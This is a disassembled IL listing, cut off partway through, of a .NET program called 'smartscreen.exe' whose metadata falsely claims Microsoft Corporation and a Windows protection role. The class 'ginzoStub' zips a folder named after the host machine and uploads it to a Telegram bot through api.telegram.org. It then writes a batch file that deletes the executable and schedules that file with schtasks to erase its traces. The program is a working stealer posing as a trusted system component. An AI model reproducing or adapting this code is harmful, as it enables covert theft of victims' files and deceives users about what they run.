
//  Microsoft (R) .NET Framework IL Disassembler.  Version 4.8.3928.0




// Metadata version: v4.0.30319
.assembly extern mscorlib
{
  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 )                         // .z\V.4..
  .ver 4:0:0:0
}
.assembly extern Ionic.Zip
{
  .publickeytoken = (ED BE 51 AD 94 2A 3F 5C )                         // ..Q..*?\
  .ver 1:9:1:8
}
.assembly extern System.Net.Http
{
  .publickeytoken = (B0 3F 5F 7F 11 D5 0A 3A )                         // .?_....:
  .ver 4:2:0:0
}
.assembly extern System
{
  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 )                         // .z\V.4..
  .ver 4:0:0:0
}
.assembly smartscreen
{
  .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) = ( 01 00 08 00 00 00 00 00 ) 
  .custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78   // ....T..WrapNonEx
                                                                                                             63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 )       // ceptionThrows.

  // --- Следующий настраиваемый атрибут добавлен автоматически, не следует отменять преобразование в комментарий -------
  //  .custom instance void [mscorlib]System.Diagnostics.DebuggableAttribute::.ctor(valuetype [mscorlib]System.Diagnostics.DebuggableAttribute/DebuggingModes) = ( 01 00 02 00 00 00 00 00 ) 

  .custom instance void [mscorlib]System.Reflection.AssemblyTitleAttribute::.ctor(string) = ( 01 00 0B 73 6D 61 72 74 73 63 72 65 65 6E 00 00 ) // ...smartscreen..
  .custom instance void [mscorlib]System.Reflection.AssemblyDescriptionAttribute::.ctor(string) = ( 01 00 26 53 6D 61 72 74 53 63 72 65 65 6E 20 D0   // ..&SmartScreen .
                                                                                                    97 D0 B0 D1 89 D0 B8 D1 82 D0 BD D0 B8 D0 BA D0 
                                                                                                    B0 20 57 69 6E 64 6F 77 73 00 00 )                // . Windows..
  .custom instance void [mscorlib]System.Reflection.AssemblyConfigurationAttribute::.ctor(string) = ( 01 00 00 00 00 ) 
  .custom instance void [mscorlib]System.Reflection.AssemblyCompanyAttribute::.ctor(string) = ( 01 00 15 4D 69 63 72 6F 73 6F 66 74 20 43 6F 72   // ...Microsoft Cor
                                                                                                70 6F 72 61 74 69 6F 6E 00 00 )                   // poration..
  .custom instance void [mscorlib]System.Reflection.AssemblyProductAttribute::.ctor(string) = ( 01 00 0B 73 6D 61 72 74 73 63 72 65 65 6E 00 00 ) // ...smartscreen..
  .custom instance void [mscorlib]System.Reflection.AssemblyCopyrightAttribute::.ctor(string) = ( 01 00 3D 43 6F 70 79 72 69 67 68 74 20 C2 A9 20   // ..=Copyright .. 
                                                                                                  4D 69 63 72 6F 73 6F 66 74 28 D0 9C D0 B0 D0 B9   // Microsoft(......
                                                                                                  D0 BA D1 80 D0 BE D1 81 D0 BE D1 84 D1 82 29 20   // ..............) 
                                                                                                  43 6F 72 70 6F 72 61 74 69 6F 6E 20 32 30 32 34   // Corporation 2024
                                                                                                  00 00 ) 
  .custom instance void [mscorlib]System.Reflection.AssemblyTrademarkAttribute::.ctor(string) = ( 01 00 15 4D 69 63 72 6F 73 6F 66 74 20 43 6F 72   // ...Microsoft Cor
                                                                                                  70 6F 72 61 74 69 6F 6E 00 00 )                   // poration..
  .custom instance void [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::.ctor(bool) = ( 01 00 00 00 00 ) 
  .custom instance void [mscorlib]System.Runtime.InteropServices.GuidAttribute::.ctor(string) = ( 01 00 24 31 34 30 62 33 61 65 37 2D 35 38 65 65   // ..$140b3ae7-58ee
                                                                                                  2D 34 37 32 30 2D 62 39 30 65 2D 64 36 34 31 64   // -4720-b90e-d641d
                                                                                                  61 36 39 33 63 61 39 00 00 )                      // a693ca9..
  .custom instance void [mscorlib]System.Reflection.AssemblyFileVersionAttribute::.ctor(string) = ( 01 00 0A 37 2E 32 31 2E 37 35 2E 31 32 00 00 )    // ...7.21.75.12..
  .custom instance void [mscorlib]System.Runtime.Versioning.TargetFrameworkAttribute::.ctor(string) = ( 01 00 1C 2E 4E 45 54 46 72 61 6D 65 77 6F 72 6B   // ....NETFramework
                                                                                                        2C 56 65 72 73 69 6F 6E 3D 76 34 2E 37 2E 32 01   // ,Version=v4.7.2.
                                                                                                        00 54 0E 14 46 72 61 6D 65 77 6F 72 6B 44 69 73   // .T..FrameworkDis
                                                                                                        70 6C 61 79 4E 61 6D 65 14 2E 4E 45 54 20 46 72   // playName..NET Fr
                                                                                                        61 6D 65 77 6F 72 6B 20 34 2E 37 2E 32 )          // amework 4.7.2
  .hash algorithm 0x00008004
  .ver 3:20:5:6
}
.module smartscreen.exe
// MVID: {12793257-DADF-4BD6-9D62-5B73B70959FC}
.imagebase 0x00400000
.file alignment 0x00000200
.stackreserve 0x00100000
.subsystem 0x0002       // WINDOWS_GUI
.corflags 0x00020003    //  ILONLY 32BITPREFERRED
// Image base: 0x073A0000


// =============== CLASS MEMBERS DECLARATION ===================

.class private auto ansi beforefieldinit ginzoStub.Program
       extends [mscorlib]System.Object
{
  .class auto ansi sealed nested private beforefieldinit '<ArchiveAndSendAsync>d__2'
         extends [mscorlib]System.ValueType
         implements [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
    .field public int32 '<>1__state'
    .field public valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder '<>t__builder'
    .field public string folderPath
    .field public string chatId
    .field public string botToken
    .field public string message
    .field private string '<tempFolder>5__2'
    .field private string '<archivePath>5__3'
    .field private valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter '<>u__1'
    .method private hidebysig newslot virtual final 
            instance void  MoveNext() cil managed
    {
      .override [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine::MoveNext
      // Размер кода:       541 (0x21d)
      .maxstack  5
      .locals init (int32 V_0,
               string V_1,
               string V_2,
               string V_3,
               string V_4,
               string V_5,
               valuetype [mscorlib]System.DateTime V_6,
               string V_7,
               class [Ionic.Zip]Ionic.Zip.ZipFile V_8,
               valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter V_9,
               valuetype [mscorlib]System.DateTime V_10,
               class [mscorlib]System.Exception V_11)
      IL_0000:  ldarg.0
      IL_0001:  ldfld      int32 ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>1__state'
      IL_0006:  stloc.0
      .try
      {
        IL_0007:  ldloc.0
        IL_0008:  brfalse    IL_00bf

        IL_000d:  call       string [mscorlib]System.Environment::get_MachineName()
        IL_0012:  ldarg.0
        IL_0013:  call       string [mscorlib]System.IO.Path::GetTempPath()
        IL_0018:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<tempFolder>5__2'
        IL_001d:  ldstr      ".zip"
        IL_0022:  call       string [mscorlib]System.String::Concat(string,
                                                                    string)
        IL_0027:  stloc.1
        IL_0028:  ldarg.0
        IL_0029:  ldarg.0
        IL_002a:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<tempFolder>5__2'
        IL_002f:  ldloc.1
        IL_0030:  call       string [mscorlib]System.IO.Path::Combine(string,
                                                                      string)
        IL_0035:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<archivePath>5__3'
        IL_003a:  newobj     instance void [Ionic.Zip]Ionic.Zip.ZipFile::.ctor()
        IL_003f:  stloc.s    V_8
        .try
        {
          IL_0041:  ldloc.s    V_8
          IL_0043:  ldarg.0
          IL_0044:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::folderPath
          IL_0049:  callvirt   instance class [Ionic.Zip]Ionic.Zip.ZipEntry [Ionic.Zip]Ionic.Zip.ZipFile::AddDirectory(string)
          IL_004e:  pop
          IL_004f:  ldloc.s    V_8
          IL_0051:  ldarg.0
          IL_0052:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<archivePath>5__3'
          IL_0057:  callvirt   instance void [Ionic.Zip]Ionic.Zip.ZipFile::Save(string)
          IL_005c:  leave.s    IL_006e

        }  // end .try
        finally
        {
          IL_005e:  ldloc.0
          IL_005f:  ldc.i4.0
          IL_0060:  bge.s      IL_006d

          IL_0062:  ldloc.s    V_8
          IL_0064:  brfalse.s  IL_006d

          IL_0066:  ldloc.s    V_8
          IL_0068:  callvirt   instance void [mscorlib]System.IDisposable::Dispose()
          IL_006d:  endfinally
        }  // end handler
        IL_006e:  ldarg.0
        IL_006f:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<archivePath>5__3'
        IL_0074:  ldarg.0
        IL_0075:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::chatId
        IL_007a:  ldarg.0
        IL_007b:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::botToken
        IL_0080:  ldarg.0
        IL_0081:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::message
        IL_0086:  call       class [mscorlib]System.Threading.Tasks.Task ginzoStub.Program::SendFileToBot(string,
                                                                                                          string,
                                                                                                          string,
                                                                                                          string)
        IL_008b:  callvirt   instance valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter [mscorlib]System.Threading.Tasks.Task::GetAwaiter()
        IL_0090:  stloc.s    V_9
        IL_0092:  ldloca.s   V_9
        IL_0094:  call       instance bool [mscorlib]System.Runtime.CompilerServices.TaskAwaiter::get_IsCompleted()
        IL_0099:  brtrue.s   IL_00dc

        IL_009b:  ldarg.0
        IL_009c:  ldc.i4.0
        IL_009d:  dup
        IL_009e:  stloc.0
        IL_009f:  stfld      int32 ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>1__state'
        IL_00a4:  ldarg.0
        IL_00a5:  ldloc.s    V_9
        IL_00a7:  stfld      valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>u__1'
        IL_00ac:  ldarg.0
        IL_00ad:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
        IL_00b2:  ldloca.s   V_9
        IL_00b4:  ldarg.0
        IL_00b5:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::AwaitUnsafeOnCompleted<valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter,valuetype ginzoStub.Program/'<ArchiveAndSendAsync>d__2'>(!!0&,
                                                                                                                                                                                                                                                             !!1&)
        IL_00ba:  leave      IL_021c

        IL_00bf:  ldarg.0
        IL_00c0:  ldfld      valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>u__1'
        IL_00c5:  stloc.s    V_9
        IL_00c7:  ldarg.0
        IL_00c8:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>u__1'
        IL_00cd:  initobj    [mscorlib]System.Runtime.CompilerServices.TaskAwaiter
        IL_00d3:  ldarg.0
        IL_00d4:  ldc.i4.m1
        IL_00d5:  dup
        IL_00d6:  stloc.0
        IL_00d7:  stfld      int32 ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>1__state'
        IL_00dc:  ldloca.s   V_9
        IL_00de:  call       instance void [mscorlib]System.Runtime.CompilerServices.TaskAwaiter::GetResult()
        IL_00e3:  ldarg.0
        IL_00e4:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<archivePath>5__3'
        IL_00e9:  call       void [mscorlib]System.IO.File::Delete(string)
        IL_00ee:  call       string [mscorlib]System.IO.Path::GetRandomFileName()
        IL_00f3:  ldstr      "."
        IL_00f8:  ldstr      ""
        IL_00fd:  callvirt   instance string [mscorlib]System.String::Replace(string,
                                                                              string)
        IL_0102:  ldstr      ".bat"
        IL_0107:  call       string [mscorlib]System.String::Concat(string,
                                                                    string)
        IL_010c:  stloc.2
        IL_010d:  ldarg.0
        IL_010e:  ldfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<tempFolder>5__2'
        IL_0113:  ldloc.2
        IL_0114:  call       string [mscorlib]System.IO.Path::Combine(string,
                                                                      string)
        IL_0119:  stloc.3
        IL_011a:  call       class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetExecutingAssembly()
        IL_011f:  callvirt   instance string [mscorlib]System.Reflection.Assembly::get_Location()
        IL_0124:  stloc.s    V_4
        IL_0126:  ldloc.3
        IL_0127:  ldc.i4.5
        IL_0128:  newarr     [mscorlib]System.String
        IL_012d:  dup
        IL_012e:  ldc.i4.0
        IL_012f:  ldstr      "@echo off\r\nif exist \""
        IL_0134:  stelem.ref
        IL_0135:  dup
        IL_0136:  ldc.i4.1
        IL_0137:  ldloc.s    V_4
        IL_0139:  stelem.ref
        IL_013a:  dup
        IL_013b:  ldc.i4.2
        IL_013c:  ldstr      "\" del /f /q \""
        IL_0141:  stelem.ref
        IL_0142:  dup
        IL_0143:  ldc.i4.3
        IL_0144:  ldloc.s    V_4
        IL_0146:  stelem.ref
        IL_0147:  dup
        IL_0148:  ldc.i4.4
        IL_0149:  ldstr      "\""
        IL_014e:  stelem.ref
        IL_014f:  call       string [mscorlib]System.String::Concat(string[])
        IL_0154:  call       void [mscorlib]System.IO.File::WriteAllText(string,
                                                                         string)
        IL_0159:  ldstr      "ConsoleApplicationSetup_{0}"
        IL_015e:  call       valuetype [mscorlib]System.Guid [mscorlib]System.Guid::NewGuid()
        IL_0163:  box        [mscorlib]System.Guid
        IL_0168:  call       string [mscorlib]System.String::Format(string,
                                                                    object)
        IL_016d:  stloc.s    V_5
        IL_016f:  call       valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::get_Now()
        IL_0174:  stloc.s    V_10
        IL_0176:  ldloca.s   V_10
        IL_0178:  ldc.r8     1.
        IL_0181:  call       instance valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::AddMinutes(float64)
        IL_0186:  stloc.s    V_6
        IL_0188:  ldc.i4.6
        IL_0189:  newarr     [mscorlib]System.String
        IL_018e:  dup
        IL_018f:  ldc.i4.0
        IL_0190:  ldstr      "/create /tn "
        IL_0195:  stelem.ref
        IL_0196:  dup
        IL_0197:  ldc.i4.1
        IL_0198:  ldloc.s    V_5
        IL_019a:  stelem.ref
        IL_019b:  dup
        IL_019c:  ldc.i4.2
        IL_019d:  ldstr      " /tr \"\"\""
        IL_01a2:  stelem.ref
        IL_01a3:  dup
        IL_01a4:  ldc.i4.3
        IL_01a5:  ldloc.3
        IL_01a6:  stelem.ref
        IL_01a7:  dup
        IL_01a8:  ldc.i4.4
        IL_01a9:  ldstr      "\"\"\" /sc once /st "
        IL_01ae:  stelem.ref
        IL_01af:  dup
        IL_01b0:  ldc.i4.5
        IL_01b1:  ldloca.s   V_6
        IL_01b3:  ldstr      "HH:mm"
        IL_01b8:  call       instance string [mscorlib]System.DateTime::ToString(string)
        IL_01bd:  stelem.ref
        IL_01be:  call       string [mscorlib]System.String::Concat(string[])
        IL_01c3:  stloc.s    V_7
        IL_01c5:  ldstr      "schtasks"
        IL_01ca:  ldloc.s    V_7
        IL_01cc:  call       class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(string,
                                                                                                                string)
        IL_01d1:  pop
        IL_01d2:  leave.s    IL_01fb

      }  // end .try
      catch [mscorlib]System.Exception 
      {
        IL_01d4:  stloc.s    V_11
        IL_01d6:  ldarg.0
        IL_01d7:  ldc.i4.s   -2
        IL_01d9:  stfld      int32 ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>1__state'
        IL_01de:  ldarg.0
        IL_01df:  ldnull
        IL_01e0:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<tempFolder>5__2'
        IL_01e5:  ldarg.0
        IL_01e6:  ldnull
        IL_01e7:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<archivePath>5__3'
        IL_01ec:  ldarg.0
        IL_01ed:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
        IL_01f2:  ldloc.s    V_11
        IL_01f4:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetException(class [mscorlib]System.Exception)
        IL_01f9:  leave.s    IL_021c

      }  // end handler
      IL_01fb:  ldarg.0
      IL_01fc:  ldc.i4.s   -2
      IL_01fe:  stfld      int32 ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>1__state'
      IL_0203:  ldarg.0
      IL_0204:  ldnull
      IL_0205:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<tempFolder>5__2'
      IL_020a:  ldarg.0
      IL_020b:  ldnull
      IL_020c:  stfld      string ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<archivePath>5__3'
      IL_0211:  ldarg.0
      IL_0212:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
      IL_0217:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetResult()
      IL_021c:  ret
    } // end of method '<ArchiveAndSendAsync>d__2'::MoveNext

    .method private hidebysig newslot virtual final 
            instance void  SetStateMachine(class [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine stateMachine) cil managed
    {
      .custom instance void [mscorlib]System.Diagnostics.DebuggerHiddenAttribute::.ctor() = ( 01 00 00 00 ) 
      .override [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine::SetStateMachine
      // Размер кода:       13 (0xd)
      .maxstack  8
      IL_0000:  ldarg.0
      IL_0001:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<ArchiveAndSendAsync>d__2'::'<>t__builder'
      IL_0006:  ldarg.1
      IL_0007:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetStateMachine(class [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine)
      IL_000c:  ret
    } // end of method '<ArchiveAndSendAsync>d__2'::SetStateMachine

  } // end of class '<ArchiveAndSendAsync>d__2'

  .class auto ansi sealed nested private beforefieldinit '<Main>d__0'
         extends [mscorlib]System.ValueType
         implements [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
    .field public int32 '<>1__state'
    .field public valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder '<>t__builder'
    .method private hidebysig newslot virtual final 
            instance void  MoveNext() cil managed
    {
      .override [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine::MoveNext
      // Размер кода:       50 (0x32)
      .maxstack  2
      .locals init (class [mscorlib]System.Exception V_0)
      .try
      {
        IL_0000:  call       void ginzoStub.Program::FindAndArchive()
        IL_0005:  leave.s    IL_001e

      }  // end .try
      catch [mscorlib]System.Exception 
      {
        IL_0007:  stloc.0
        IL_0008:  ldarg.0
        IL_0009:  ldc.i4.s   -2
        IL_000b:  stfld      int32 ginzoStub.Program/'<Main>d__0'::'<>1__state'
        IL_0010:  ldarg.0
        IL_0011:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<Main>d__0'::'<>t__builder'
        IL_0016:  ldloc.0
        IL_0017:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetException(class [mscorlib]System.Exception)
        IL_001c:  leave.s    IL_0031

      }  // end handler
      IL_001e:  ldarg.0
      IL_001f:  ldc.i4.s   -2
      IL_0021:  stfld      int32 ginzoStub.Program/'<Main>d__0'::'<>1__state'
      IL_0026:  ldarg.0
      IL_0027:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<Main>d__0'::'<>t__builder'
      IL_002c:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetResult()
      IL_0031:  ret
    } // end of method '<Main>d__0'::MoveNext

    .method private hidebysig newslot virtual final 
            instance void  SetStateMachine(class [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine stateMachine) cil managed
    {
      .custom instance void [mscorlib]System.Diagnostics.DebuggerHiddenAttribute::.ctor() = ( 01 00 00 00 ) 
      .override [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine::SetStateMachine
      // Размер кода:       13 (0xd)
      .maxstack  8
      IL_0000:  ldarg.0
      IL_0001:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<Main>d__0'::'<>t__builder'
      IL_0006:  ldarg.1
      IL_0007:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::SetStateMachine(class [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine)
      IL_000c:  ret
    } // end of method '<Main>d__0'::SetStateMachine

  } // end of class '<Main>d__0'

  .class auto ansi sealed nested private beforefieldinit '<SendFileToBot>d__1'
         extends [mscorlib]System.ValueType
         implements [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
    .field public int32 '<>1__state'
    .field public valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder '<>t__builder'
    .field public string botToken
    .field public string filePath
    .field public string chatId
    .field public string message
    .field private class [System.Net.Http]System.Net.Http.HttpClient '<client>5__2'
    .field private class [System.Net.Http]System.Net.Http.MultipartFormDataContent '<formData>5__3'
    .field private class [mscorlib]System.IO.FileStream '<fileStream>5__4'
    .field private valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage> '<>u__1'
    .method private hidebysig newslot virtual final 
            instance void  MoveNext() cil managed
    {
      .override [mscorlib]System.Runtime.CompilerServices.IAsyncStateMachine::MoveNext
      // Размер кода:       431 (0x1af)
      .maxstack  4
      .locals init (int32 V_0,
               string V_1,
               valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage> V_2,
               class [mscorlib]System.Exception V_3)
      IL_0000:  ldarg.0
      IL_0001:  ldfld      int32 ginzoStub.Program/'<SendFileToBot>d__1'::'<>1__state'
      IL_0006:  stloc.0
      .try
      {
        IL_0007:  ldloc.0
        IL_0008:  brfalse.s  IL_002b

        IL_000a:  ldstr      "https://api.telegram.org/bot"
        IL_000f:  ldarg.0
        IL_0010:  ldfld      string ginzoStub.Program/'<SendFileToBot>d__1'::botToken
        IL_0015:  ldstr      "/sendDocument"
        IL_001a:  call       string [mscorlib]System.String::Concat(string,
                                                                    string,
                                                                    string)
        IL_001f:  stloc.1
        IL_0020:  ldarg.0
        IL_0021:  newobj     instance void [System.Net.Http]System.Net.Http.HttpClient::.ctor()
        IL_0026:  stfld      class [System.Net.Http]System.Net.Http.HttpClient ginzoStub.Program/'<SendFileToBot>d__1'::'<client>5__2'
        IL_002b:  nop
        .try
        {
          IL_002c:  ldloc.0
          IL_002d:  brfalse.s  IL_003a

          IL_002f:  ldarg.0
          IL_0030:  newobj     instance void [System.Net.Http]System.Net.Http.MultipartFormDataContent::.ctor()
          IL_0035:  stfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
          IL_003a:  nop
          .try
          {
            IL_003b:  ldloc.0
            IL_003c:  brfalse.s  IL_004f

            IL_003e:  ldarg.0
            IL_003f:  ldarg.0
            IL_0040:  ldfld      string ginzoStub.Program/'<SendFileToBot>d__1'::filePath
            IL_0045:  call       class [mscorlib]System.IO.FileStream [mscorlib]System.IO.File::OpenRead(string)
            IL_004a:  stfld      class [mscorlib]System.IO.FileStream ginzoStub.Program/'<SendFileToBot>d__1'::'<fileStream>5__4'
            IL_004f:  nop
            .try
            {
              IL_0050:  ldloc.0
              IL_0051:  brfalse    IL_00f6

              IL_0056:  ldarg.0
              IL_0057:  ldfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
              IL_005c:  ldarg.0
              IL_005d:  ldfld      string ginzoStub.Program/'<SendFileToBot>d__1'::chatId
              IL_0062:  newobj     instance void [System.Net.Http]System.Net.Http.StringContent::.ctor(string)
              IL_0067:  ldstr      "chat_id"
              IL_006c:  callvirt   instance void [System.Net.Http]System.Net.Http.MultipartFormDataContent::Add(class [System.Net.Http]System.Net.Http.HttpContent,
                                                                                                                string)
              IL_0071:  ldarg.0
              IL_0072:  ldfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
              IL_0077:  ldarg.0
              IL_0078:  ldfld      string ginzoStub.Program/'<SendFileToBot>d__1'::message
              IL_007d:  newobj     instance void [System.Net.Http]System.Net.Http.StringContent::.ctor(string)
              IL_0082:  ldstr      "caption"
              IL_0087:  callvirt   instance void [System.Net.Http]System.Net.Http.MultipartFormDataContent::Add(class [System.Net.Http]System.Net.Http.HttpContent,
                                                                                                                string)
              IL_008c:  ldarg.0
              IL_008d:  ldfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
              IL_0092:  ldarg.0
              IL_0093:  ldfld      class [mscorlib]System.IO.FileStream ginzoStub.Program/'<SendFileToBot>d__1'::'<fileStream>5__4'
              IL_0098:  newobj     instance void [System.Net.Http]System.Net.Http.StreamContent::.ctor(class [mscorlib]System.IO.Stream)
              IL_009d:  ldstr      "document"
              IL_00a2:  ldarg.0
              IL_00a3:  ldfld      string ginzoStub.Program/'<SendFileToBot>d__1'::filePath
              IL_00a8:  call       string [mscorlib]System.IO.Path::GetFileName(string)
              IL_00ad:  callvirt   instance void [System.Net.Http]System.Net.Http.MultipartFormDataContent::Add(class [System.Net.Http]System.Net.Http.HttpContent,
                                                                                                                string,
                                                                                                                string)
              IL_00b2:  ldarg.0
              IL_00b3:  ldfld      class [System.Net.Http]System.Net.Http.HttpClient ginzoStub.Program/'<SendFileToBot>d__1'::'<client>5__2'
              IL_00b8:  ldloc.1
              IL_00b9:  ldarg.0
              IL_00ba:  ldfld      class [System.Net.Http]System.Net.Http.MultipartFormDataContent ginzoStub.Program/'<SendFileToBot>d__1'::'<formData>5__3'
              IL_00bf:  callvirt   instance class [mscorlib]System.Threading.Tasks.Task`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage> [System.Net.Http]System.Net.Http.HttpClient::PostAsync(string,
                                                                                                                                                                                                             class [System.Net.Http]System.Net.Http.HttpContent)
              IL_00c4:  callvirt   instance valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<!0> class [mscorlib]System.Threading.Tasks.Task`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage>::GetAwaiter()
              IL_00c9:  stloc.2
              IL_00ca:  ldloca.s   V_2
              IL_00cc:  call       instance bool valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage>::get_IsCompleted()
              IL_00d1:  brtrue.s   IL_0112

              IL_00d3:  ldarg.0
              IL_00d4:  ldc.i4.0
              IL_00d5:  dup
              IL_00d6:  stloc.0
              IL_00d7:  stfld      int32 ginzoStub.Program/'<SendFileToBot>d__1'::'<>1__state'
              IL_00dc:  ldarg.0
              IL_00dd:  ldloc.2
              IL_00de:  stfld      valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage> ginzoStub.Program/'<SendFileToBot>d__1'::'<>u__1'
              IL_00e3:  ldarg.0
              IL_00e4:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder ginzoStub.Program/'<SendFileToBot>d__1'::'<>t__builder'
              IL_00e9:  ldloca.s   V_2
              IL_00eb:  ldarg.0
              IL_00ec:  call       instance void [mscorlib]System.Runtime.CompilerServices.AsyncTaskMethodBuilder::AwaitUnsafeOnCompleted<valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage>,valuetype ginzoStub.Program/'<SendFileToBot>d__1'>(!!0&,
                                                                                                                                                                                                                                                                                                                           !!1&)
              IL_00f1:  leave      IL_01ae

              IL_00f6:  ldarg.0
              IL_00f7:  ldfld      valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage> ginzoStub.Program/'<SendFileToBot>d__1'::'<>u__1'
              IL_00fc:  stloc.2
              IL_00fd:  ldarg.0
              IL_00fe:  ldflda     valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage> ginzoStub.Program/'<SendFileToBot>d__1'::'<>u__1'
              IL_0103:  initobj    valuetype [mscorlib]System.Runtime.CompilerServices.TaskAwaiter`1<class [System.Net.Http]System.Net.Http.HttpResponseMessage>
              IL_0109:  ldarg.0
              IL_010a:  ldc.i4.m1
              IL_010b:  dup
              IL_010c:  stloc.0
